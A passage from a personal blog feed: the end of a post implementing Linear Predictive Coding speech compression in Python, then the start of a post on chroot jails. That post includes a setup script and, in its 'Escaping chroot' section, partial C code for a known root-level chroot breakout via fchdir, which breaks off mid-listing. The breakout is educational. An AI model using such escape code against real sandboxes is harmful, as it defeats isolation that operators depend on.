class="n">offset</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="n">step</span> <span class="n">x</span><span class="p">[</span><span class="n">offset</span> <span class="p">:</span> <span class="n">nw</span> <span class="o">+</span> <span class="n">offset</span><span class="p">]</span> <span class="o">+=</span> <span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:]</span> <span class="k">return</span> <span class="n">x</span></code></pre></figure> <h3 id="hann-window">Hann Window</h3> <p>The <a href="https://en.wikipedia.org/wiki/Hann_function">Hann window</a>, also known as the raised-cosine window, is a function that satisfies the properties we described above. <a href="https://en.wikipedia.org/wiki/Window_function#Comparison_of_windows">Wikipedia</a> offers some insight into the choice of a Hann function:</p> <blockquote> <p>In between the extremes are moderate windows, such as Hamming and Hann. They are commonly used in narrowband applications, such as the spectrum of a telephone channel.</p> </blockquote> <p>It’s available in <code class="language-plaintext highlighter-rouge">scipy.signal</code>. The first parameter is the size of the window in number of points, which will determine the size of the blocks as we saw above. The original article uses a window corresponding to 30ms.</p> <p>The second parameter is whether the window is <em>symmetric</em> (that is the weights form a “palindrome”) or <em>periodic</em>.
The periodic window of size $n$ is the same as the symmetric window of size $n + 1$ without the last point: <code class="language-plaintext highlighter-rouge">hann(n, False) == hann(n + 1, True)[:-1]</code>.</p> <p>I don’t understand the details, but a periodic window seems to work better for spectral analysis of the signal, which is what we’ll be doing by inferring the frequency of the resonance filter.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">scipy.signal.windows</span> <span class="kn">import</span> <span class="n">hann</span> <span class="n">sym</span> <span class="o">=</span> <span class="bp">False</span> <span class="c1"># periodic </span><span class="n">hann</span><span class="p">(</span><span class="n">floor</span><span class="p">(</span><span class="mf">0.03</span> <span class="o">*</span> <span class="n">sample_rate</span><span class="p">),</span> <span class="n">sym</span><span class="p">)</span> <span class="c1"># 30ms window</span></code></pre></figure> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-05-13-lpc-in-python/hann.png" alt="Line chart with the weights of the Hann window function for n=240." /> <figcaption>Figure 2: Hann Window weights for n=240.</figcaption> </figure> <h2 id="encoding">Encoding</h2> <p>We’ve seen how to massage the signal and break it into small chunks. Now we’ll see how to infer the coefficients from any given chunk using the source-filter model.</p> <h3 id="the-lpc-model">The LPC Model</h3> <p>Let $x_t$ be the amplitude of our signal at a given instant $t$. According to the source-filter model, it’s generated by a source signal $e$ going through a resonant filter $h$.</p> $x_t = (h * e)_t$ <p>The $*$ denotes the convolution operator. 
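As a quick illustration (my own example, not from the original post, using a made-up 3-tap filter), discrete convolution can be computed with NumPy:

```python
import numpy as np

# hypothetical 3-tap filter h and a short source signal e
h = np.array([0.5, 0.3, 0.2])
e = np.array([1.0, 0.0, 0.0, 1.0])

# x_t = (h * e)_t: each output sample is a weighted sum of past source samples
x = np.convolve(e, h)
print(x)  # [0.5 0.3 0.2 0.5 0.3 0.2]
```

Note how each impulse in the source is "smeared" into a copy of the filter's response, which is exactly the behavior the source-filter model relies on. 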
The model further assumes that the current signal also depends on the past $p$ samples, that is $x_{t-1}, \cdots, x_{t-p}$, and that the source is constant, so effectively:</p> $x_t = \sum_{k=1}^{p} a_k x_{t - k} + e_t$ <h3 id="solving-the-model">Solving the model</h3> <p>We then have $n - 1$ equations (one for each sample, except the first), and we have to determine the $p$ coefficients $\boldsymbol a = [a_1, \cdots, a_p]^T$ and $\boldsymbol e = [e_2, \cdots, e_n]^T$:</p> \begin{align} x_1 a_1 &amp; &amp; + \, e_2 &amp;= x_2\\ x_2 a_1 &amp; + x_1 a_2 &amp; + \, e_3 &amp;= x_3\\ \vdots &amp; \\ x_p a_1 &amp; + x_{p - 1} a_2 + \cdots + x_{1} a_p &amp; + \, e_{p+1} &amp;= x_{p + 1}\\ \vdots &amp; \\ x_{n - 1} a_1 &amp; + x_{n - 2} a_2 + \cdots + x_{n - p} a_p &amp; + \, e_n &amp;= x_n\\ \end{align} <p>The approach taken is to drop the error terms and solve for $\boldsymbol a$ in the least-squares sense; the residual is then $\boldsymbol e$.</p> <p>More precisely, we define the matrix $X$ where the $i$-th row is:</p> $X_i = [x_i, x_{i - 1}, \cdots, x_{i - p + 1}]$ <p>We assume that $x_i = 0$ if $i \leq 0$. 
We define $b$ as the column vector $[x_2, \cdots, x_n]^T$, and then we solve the linear system $X \boldsymbol a = b$ for $\boldsymbol a$, minimizing the square of the error.</p> <p>One way of constructing the matrix $X$ is to generate a vector $[x_n, x_{n-1}, \cdots, x_1, 0, \cdots, 0]$ and then assign the last $p$ entries to the first row ($[x_1, 0, \cdots, 0]$), then shift the window by one and assign to the second row ($[x_2, x_1, 0, \cdots, 0]$), and so on.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">make_matrix_X</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span> <span class="n">n</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="c1"># [x_n, ..., x_1, 0, ..., 0] </span> <span class="n">xz</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">concatenate</span><span class="p">([</span><span class="n">x</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">(</span><span class="n">p</span><span class="p">)])</span> <span class="n">X</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">n</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">n</span> <span 
class="o">-</span> <span class="mi">1</span> <span class="o">-</span> <span class="n">i</span> <span class="n">X</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:]</span> <span class="o">=</span> <span class="n">xz</span><span class="p">[</span><span class="n">offset</span> <span class="p">:</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">p</span><span class="p">]</span> <span class="k">return</span> <span class="n">X</span></code></pre></figure> <p>We can then use <code class="language-plaintext highlighter-rouge">np.linalg.lstsq()</code> to solve and find <code class="language-plaintext highlighter-rouge">a</code>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">solve_lpc</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">ii</span><span class="p">):</span> <span class="n">b</span> <span class="o">=</span> <span class="n">x</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span> <span class="n">X</span> <span class="o">=</span> <span class="n">make_matrix_X</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="n">a</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">linalg</span><span class="p">.</span><span class="n">lstsq</span><span class="p">(</span><span class="n">X</span><span class="p">,</span> <span class="n">b</span><span class="p">.</span><span class="n">T</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="n">e</span> <span class="o">=</span> <span class="n">b</span> <span class="o">-</span> <span class="n">np</span><span class="p">.</span><span class="n">dot</span><span class="p">(</span><span 
class="n">X</span><span class="p">,</span> <span class="n">a</span><span class="p">)</span> <span class="n">g</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">var</span><span class="p">(</span><span class="n">e</span><span class="p">)</span> <span class="k">return</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span> <span class="n">g</span><span class="p">]</span></code></pre></figure> <p>The vector <code class="language-plaintext highlighter-rouge">e</code> is assumed to be samples from a white noise source. This can be modeled by a normal distribution with zero mean and the same variance $g = \sigma^2$, so this is the only parameter we need to store in our model.</p> <h3 id="encoding-the-whole-signal">Encoding the Whole Signal</h3> <p>We can now define the LPC algorithm by first splitting the original signal into chunks and then solving the model for each chunk:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">lpc_encode</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">w</span><span class="p">):</span> <span class="n">B</span> <span class="o">=</span> <span class="n">create_overlapping_blocks</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">w</span><span class="p">)</span> <span class="p">[</span><span class="n">nb</span><span class="p">,</span> <span class="n">nw</span><span class="p">]</span> <span class="o">=</span> <span class="n">B</span><span class="p">.</span><span class="n">shape</span> <span class="n">A</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">p</span><span class="p">,</span> <span class="n">nb</span><span class="p">))</span> <span class="n">G</span> <span 
class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="mi">1</span><span class="p">,</span> <span class="n">nb</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">nb</span><span class="p">):</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span> <span class="n">g</span><span class="p">]</span> <span class="o">=</span> <span class="n">solve_lpc</span><span class="p">(</span><span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:],</span> <span class="n">p</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">A</span><span class="p">[:,</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">a</span> <span class="n">G</span><span class="p">[:,</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">g</span> <span class="k">return</span> <span class="p">[</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">]</span></code></pre></figure> <h2 id="decoding">Decoding</h2> <p>Let’s look at recovering the signal from the coefficients obtained for any given chunk.</p> <h3 id="simulating-a-source-filter-model">Simulating a Source-Filter Model</h3> <p>Decoding an LPC model consists of simulating a Source-Filter model: we first generate a source signal (white noise) and then apply a filter corresponding to the coefficients.</p> <p>For the white noise, we get samples from a normal distribution. The function <code class="language-plaintext highlighter-rouge">randn()</code> implements a normal distribution with mean 0 and variance 1. 
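As a quick sanity check (my own snippet, using NumPy's newer Generator API rather than the legacy randn), we can confirm empirically that scaling unit-variance samples by the square root of g yields samples whose variance is close to g:

```python
import numpy as np

rng = np.random.default_rng(0)
g = 0.25  # hypothetical residual variance stored by the encoder

# scale unit-variance samples by sqrt(g) to obtain variance g
src = np.sqrt(g) * rng.standard_normal(100_000)
print(np.var(src))  # close to 0.25
```
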
To get a variance of <code class="language-plaintext highlighter-rouge">g</code>, we need to multiply by $\sqrt{g}$, since</p> $\mathcal{N}(\mu, \sigma^2) = \mathcal{N}(0, 1) \cdot \sigma + \mu$ <p>I don’t know anything about digital filters (EDIT: this makes a lot more sense after <a href="https://www.kuniga.me/blog/2021/09/11/z-transform.html">Z-transform</a>) but for now we can assume <code class="language-plaintext highlighter-rouge">lfilter()</code> is filtering a source signal (third argument) and amplifying certain frequencies specified by the coefficients in <code class="language-plaintext highlighter-rouge">a</code> (second argument).</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">run_source_filter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span> <span class="n">block_size</span><span class="p">):</span> <span class="n">src</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">g</span><span class="p">)</span><span class="o">*</span><span class="n">randn</span><span class="p">(</span><span class="n">block_size</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="c1"># noise </span> <span class="n">b</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">concatenate</span><span class="p">([</span><span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">([</span><span class="o">-</span><span class="mi">1</span><span class="p">]),</span> <span class="n">a</span><span class="p">])</span> <span class="n">x_hat</span> <span class="o">=</span> <span class="n">lfilter</span><span class="p">([</span><span class="mi">1</span><span class="p">],</span> <span class="n">b</span><span 
class="p">.</span><span class="n">T</span><span class="p">,</span> <span class="n">src</span><span class="p">.</span><span class="n">T</span><span class="p">).</span><span class="n">T</span> <span class="c1"># convert Nx1 matrix into a N vector </span> <span class="k">return</span> <span class="n">np</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="n">x_hat</span><span class="p">)</span></code></pre></figure> <h3 id="decoding-the-whole-signal">Decoding the Whole Signal</h3> <p>Now that we can decode the signal from a given single LPC model, we can generate all OLA blocks ($\hat B$) and add them back up to obtain the full signal ($\hat x$):</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">lpc_decode</span><span class="p">(</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">lowcut</span> <span class="o">=</span> <span class="mi">0</span><span class="p">):</span> <span class="p">[</span><span class="n">ne</span><span class="p">,</span> <span class="n">n</span><span class="p">]</span> <span class="o">=</span> <span class="n">G</span><span class="p">.</span><span class="n">shape</span> <span class="n">nw</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">w</span><span class="p">)</span> <span class="p">[</span><span class="n">p</span><span class="p">,</span> <span class="n">_</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">.</span><span class="n">shape</span> <span class="n">B_hat</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">n</span><span class="p">,</span> <span class="n">nw</span><span class="p">))</span> <span 
class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n</span><span class="p">):</span> <span class="n">B_hat</span><span class="p">[</span><span class="n">i</span><span class="p">,:]</span> <span class="o">=</span> <span class="n">run_source_filter</span><span class="p">(</span><span class="n">A</span><span class="p">[:,</span> <span class="n">i</span><span class="p">],</span> <span class="n">G</span><span class="p">[:,</span> <span class="n">i</span><span class="p">],</span> <span class="n">nw</span><span class="p">)</span> <span class="c1"># recover signal from blocks </span> <span class="n">x_hat</span> <span class="o">=</span> <span class="n">add_overlapping_blocks</span><span class="p">(</span><span class="n">B_hat</span><span class="p">);</span> <span class="k">return</span> <span class="n">x_hat</span></code></pre></figure> <p>One major difference from the reference implementation is that it re-applies the window over the decoded signal, that is,</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">B_hat</span><span class="p">[</span><span class="n">i</span><span class="p">,:]</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">multiply</span><span class="p">(</span><span class="n">w</span><span class="p">.</span><span class="n">T</span><span class="p">,</span> <span class="n">B_hat</span><span class="p">[</span><span class="n">i</span><span class="p">,:])</span></code></pre></figure> <p>My understanding is that we already applied these weights in <code class="language-plaintext highlighter-rouge">create_overlapping_blocks()</code> when generating the blocks, before encoding, so when we decode, the signal is already weighted.</p> <p>Skipping this step didn’t seem to yield any difference in the output.</p> <h2 id="experiment">Experiment</h2> <p>We’ve defined all the building blocks, so we’re now ready to 
define our experiment by putting them all together.</p> <h3 id="putting-it-all-together">Putting it all together</h3> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="p">[</span><span class="n">sample_rate</span><span class="p">,</span> <span class="n">amplitudes</span><span class="p">]</span> <span class="o">=</span> <span class="n">scipy</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">wavfile</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="s">'lpc/audio/speech.wav'</span><span class="p">)</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span> <span class="c1"># normalize </span><span class="n">amplitudes</span> <span class="o">=</span> <span class="mf">0.9</span><span class="o">*</span><span class="n">amplitudes</span><span class="o">/</span><span class="nb">max</span><span class="p">(</span><span class="nb">abs</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">));</span> <span class="c1"># resampling to 8kHz </span><span class="n">target_sample_rate</span> <span class="o">=</span> <span class="mi">8000</span> <span class="n">target_size</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span><span class="o">*</span><span class="n">target_sample_rate</span><span class="o">/</span><span class="n">sample_rate</span><span class="p">)</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">resample</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">,</span> <span class="n">target_size</span><span class="p">)</span> <span class="n">sample_rate</span> 
<span class="o">=</span> <span class="n">target_sample_rate</span> <span class="c1"># 30ms Hann window </span><span class="n">sym</span> <span class="o">=</span> <span class="bp">False</span> <span class="c1"># periodic </span><span class="n">w</span> <span class="o">=</span> <span class="n">hann</span><span class="p">(</span><span class="n">floor</span><span class="p">(</span><span class="mf">0.03</span><span class="o">*</span><span class="n">sample_rate</span><span class="p">),</span> <span class="n">sym</span><span class="p">)</span> <span class="c1"># Encode </span><span class="n">p</span> <span class="o">=</span> <span class="mi">6</span> <span class="c1"># number of poles </span><span class="p">[</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">]</span> <span class="o">=</span> <span class="n">lpc_encode</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">w</span><span class="p">)</span> <span class="c1"># Print stats </span><span class="n">original_size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span> <span class="n">model_size</span> <span class="o">=</span> <span class="n">A</span><span class="p">.</span><span class="n">size</span> <span class="o">+</span> <span class="n">G</span><span class="p">.</span><span class="n">size</span> <span class="k">print</span><span class="p">(</span><span class="s">'Original signal size:'</span><span class="p">,</span> <span class="n">original_size</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Encoded signal size:'</span><span class="p">,</span> <span class="n">model_size</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Data reduction:'</span><span class="p">,</span> <span 
class="n">original_size</span><span class="o">/</span><span class="n">model_size</span><span class="p">)</span> <span class="n">xhat</span> <span class="o">=</span> <span class="n">lpc_decode</span><span class="p">(</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">,</span> <span class="n">w</span><span class="p">)</span> <span class="n">scipy</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">wavfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"example.wav"</span><span class="p">,</span> <span class="n">sample_rate</span><span class="p">,</span> <span class="n">xhat</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'done'</span><span class="p">)</span></code></pre></figure> <p>The full code is available as a <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-05-13-lpc-in-python/lpc.ipynb">Jupyter notebook</a>.</p> <h3 id="results">Results</h3> <p>Running with the audio <code class="language-plaintext highlighter-rouge">speech.wav</code> provided with the reference material, we obtained</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">Original signal size: 96,249 (floats) Encoded signal size: 5,607 (floats) Data reduction: 17x</code></pre></figure> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-05-13-lpc-in-python/comparison.png" alt="Line chart with 2 series, displaying the original signal vs the decoded signal." /> <figcaption>Figure 3: Original signal (red) vs. Decoded signal (blue).</figcaption> </figure> <h2 id="conclusion">Conclusion</h2> <p>In this post we learned how to implement the LPC method for encoding and decoding in Python. 
As always, having to implement an algorithm made me understand it in much more depth, including the source-filter model.</p> <p>This is the first time I deal with signal processing and there were a lot of concepts to learn. Hopefully my newbie perspective is helpful to other people starting in this area without formal training.</p> <p>Digital filters seem like a vast area and something I’m interested in digging into.</p> <h2 id="appendix-converting-matlab-to-python">Appendix: Converting Matlab to Python</h2> <p>I struggled a lot to make the Python code work, even when I had a working version of the Matlab code running through Octave.</p> <p>In dealing with multi-dimensional numerical applications like this, it’s very easy to get dimensions wrong because the APIs sometimes are permissive and do different things depending on the dimensions of the data we pass in. It is hard to validate intermediate results because they might not have a clear interpretation, making it harder to debug.</p> <p>A few techniques were extremely helpful for debugging, leveraging the fact I had the Octave code. The idea is to compare intermediate results.</p> <p><strong>CSV exports/import.</strong> Due to differences in implementation and random number generation, it’s impossible to compare values directly - one idea is to save intermediate results into a CSV file from Octave and then load them into Python. If this happens inside a loop, we pick a specific index.</p> <p><strong>Histogram of the data.</strong> A simpler technique, especially if there is no randomness involved, is to display a histogram of the values in the matrix in both Python and Octave:</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">print('x', np.histogram(x.flatten()))</code></pre></figure> <p>Numpy and Octave use the same number of buckets by default but choose the bucket labels differently. 
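For example (my own snippet, with synthetic data standing in for a real intermediate matrix), <code class="language-plaintext highlighter-rouge">np.histogram</code> returns the per-bucket counts alongside the bucket edges, and the counts are what we compare across the two implementations:

```python
import numpy as np

x = np.linspace(0.0, 1.0, 100)  # synthetic stand-in for an intermediate matrix
counts, edges = np.histogram(x.flatten())  # 10 buckets by default
print(counts.sum(), len(counts))  # 100 values spread across 10 buckets
```
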
It’s still useful for checking the number of elements in each bucket.</p> <p><strong>Visualizing.</strong> Another way to compare results is to plot the data as a time series. Even when randomness is involved, the overall shapes of the Python and Octave results should resemble each other.</p> <h2 id="related-posts">Related Posts</h2> <p><a href="https://www.kuniga.me/blog/2020/02/20/levinson-recursion.html">Levinson Recursion</a> - The whole reason we studied the Levinson Recursion algorithm is for the Linear Predictive Coding algorithm. The matrix returned by <code class="language-plaintext highlighter-rouge">make_matrix_X()</code> is a Toeplitz one, but it’s not a square one. I haven’t found references on how to adapt the Levinson algorithm for non-square matrices.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://ccrma.stanford.edu/~hskim08/lpc">1</a>] Linear Predictive Coding is All-Pole Resonance Modeling - Hyung-Suk Kim</li> <li>[<a href="https://dsp.stackexchange.com/questions/22107/why-is-telephone-audio-sampled-at-8-khz">2</a>] Signal Processing: Why is telephone audio sampled at 8 kHz?</li> <li>[<a href="https://en.wikipedia.org/wiki/Window_function#Comparison_of_windows">3</a>] Wikipedia: Window Functions, Comparison of windows</li> <li>[<a href="https://www.mathworks.com/matlabcentral/answers/94503-what-is-the-periodic-sampling-option-in-the-hamming-function-used-for-in-signal-processing-toolbox">4</a>] MathWorks - What is the ‘periodic’ sampling option in the HAMMING function?</li> <li>[<a href="https://ccrma.stanford.edu/~jos/filters/filters.html">5</a>] Digital Filters</li> </ul>Guilherme KunigamiLinear Predictive Coding (LPC) is a method for estimating the coefficients of a Source-Filter model (post) from given data. The input consists of a time-series representing amplitudes of speech collected at fixed intervals over a period of time. 
The output is a matrix of coefficients corresponding to the source and filter model and is much more compact, so this method can be used for compressing audio. In this post we’ll study the encoding of an audio signal using LPC, which can achieve 17x compression. We’ll then decode it into very noisy but intelligible speech.Chroot Jailing2021-04-19T00:00:00+00:002021-04-19T00:00:00+00:00https://www.kuniga.me/blog/2021/04/19/chroot-jail<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll study how to use the utility <code class="language-plaintext highlighter-rouge">chroot</code> to create a jailed environment. We’ll also cover some security holes with this approach.</p> <!--more--> <h2 id="a-simple-chroot-environment">A Simple Chroot Environment</h2> <p>The <code class="language-plaintext highlighter-rouge">chroot</code> command can be used to redefine the filesystem tree root as a new directory. If we want a directory, say <code class="language-plaintext highlighter-rouge">$HOME/root/</code>, to be our new root, we can start a bash shell as:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">mkdir</span> <span class="nv">$HOME</span>/root/ <span class="nb">sudo chroot</span> <span class="nv">$HOME</span>/root/</code></pre></figure> <p>This will fail with:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">chroot</span>: failed to run <span class="nb">command</span> ‘/bin/bash’: No such file or directory</code></pre></figure> <p>The problem is that because <code class="language-plaintext highlighter-rouge">$HOME/root/</code> is empty, there are no binaries available, so we won’t be able to do much.</p> <p>We can use a simple Bash script to copy the binaries and their dependencies to the new root directory.</p> <p><code class="language-plaintext highlighter-rouge">setup.sh</code>:</p> <figure 
class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="c"># binaries we want in our chroot</span> <span class="nv">bins</span><span class="o">=(</span> <span class="s2">"/bin/bash"</span> <span class="s2">"/bin/ls"</span> <span class="s2">"/bin/mkdir"</span> <span class="o">)</span> <span class="nv">NEW_ROOT</span><span class="o">=</span><span class="s2">"</span><span class="nv">$HOME</span><span class="s2">/root"</span> <span class="k">for </span>bin_file <span class="k">in</span> <span class="s2">"</span><span class="k">${</span><span class="nv">bins</span><span class="p">[@]</span><span class="k">}</span><span class="s2">"</span> <span class="k">do</span> <span class="c"># copy binaries</span> <span class="nv">bin_dir</span><span class="o">=</span><span class="si">$(</span><span class="nb">dirname</span> <span class="nv">$bin_file</span><span class="si">)</span> <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$NEW_ROOT$bin_dir</span> <span class="nb">cp</span> <span class="nv">$bin_file</span> <span class="nv">$NEW_ROOT$bin_dir</span> <span class="nv">deps</span><span class="o">=</span><span class="si">$(</span>ldd <span class="nv">$bin_file</span><span class="si">)</span> <span class="c"># copy dependencies from binaries</span> <span class="k">while </span><span class="nb">read</span> <span class="nt">-r</span> dep<span class="p">;</span> <span class="k">do</span> <span class="c"># ldd returns too much info. 
we're only interested</span> <span class="c"># in the actual files</span> <span class="nv">dep_file</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$dep</span> | <span class="nb">grep</span> <span class="nt">-o</span> <span class="s2">"</span><span class="se">\/</span><span class="s2">[a-z0-9_</span><span class="se">\.\/\-</span><span class="s2">]*"</span><span class="si">)</span> <span class="k">if</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-z</span> <span class="s2">"</span><span class="nv">$dep_file</span><span class="s2">"</span> <span class="o">]</span> <span class="k">then </span><span class="nv">dep_dir</span><span class="o">=</span><span class="si">$(</span><span class="nb">dirname</span> <span class="nv">$dep_file</span><span class="si">)</span> <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$NEW_ROOT$dep_dir</span> <span class="nb">cp</span> <span class="nv">$dep_file</span> <span class="nv">$NEW_ROOT$dep_dir</span> <span class="k">fi done</span> <span class="o">&lt;&lt;&lt;</span> <span class="s2">"</span><span class="nv">$deps</span><span class="s2">"</span> <span class="k">done</span></code></pre></figure> <p>This adds <code class="language-plaintext highlighter-rouge">/bin/bash</code>, <code class="language-plaintext highlighter-rouge">/bin/ls</code>, <code class="language-plaintext highlighter-rouge">/bin/mkdir</code> and their dependencies to the chroot environment. 
We can now do:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./setup.sh <span class="nb">sudo chroot</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>and in there, inspect the root directory:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$</span><span class="nb">ls</span> / bin lib lib64</code></pre></figure> <p>Note that we can’t go beyond that:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cd</span> / <span class="nv">$</span><span class="nb">cd</span> .. <span class="nv">$ </span><span class="nb">ls </span>bin lib lib64</code></pre></figure> <p>It’s worth noting that <code class="language-plaintext highlighter-rouge">chroot</code> does not clone the subtree under the new root in any way. <code class="language-plaintext highlighter-rouge">chroot</code> seems to only impose restrictions on accesses above the new root.</p> <p>We can verify that by creating a new directory inside the jailed environment:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$mkdir</span> hello</code></pre></figure> <p>If we exit the <code class="language-plaintext highlighter-rouge">chroot</code> (e.g. with <code class="language-plaintext highlighter-rouge">ctrl+d</code>) and return to the original process, we’ll see the directory is still in <code class="language-plaintext highlighter-rouge">$HOME/root/</code>.</p> <h2 id="escaping-chroot">Escaping chroot</h2> <p>It’s possible to “escape” from a <code class="language-plaintext highlighter-rouge">chroot</code>ed environment if we have root access and a C binary smuggled in. One of the references 
Reference [2] provides the following code (comments added):</p> <p><code class="language-plaintext highlighter-rouge">escape.c</code>:</p> <figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include &lt;sys/stat.h&gt; #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; </span> <span class="cp">#define TEMP_DIR "hole" </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">dir_fd</span><span class="p">,</span> <span class="n">i</span><span class="p">;</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">TEMP_DIR</span><span class="p">,</span> <span class="mo">0755</span><span class="p">);</span> <span class="c1">// grab a reference to the current directory</span> <span class="c1">// since chroot() will change it</span> <span class="n">dir_fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"."</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span> <span class="n">chroot</span><span class="p">(</span><span class="n">TEMP_DIR</span><span class="p">);</span> <span class="c1">// chroot didn't close the dir_fd, so we can</span> <span class="c1">// use it to switch back to the previous</span> <span class="c1">// directory</span> <span class="n">fchdir</span><span class="p">(</span><span class="n">dir_fd</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">dir_fd</span><span class="p">);</span> <span class="c1">// climb up to the top of the directory tree enough times</span> <span 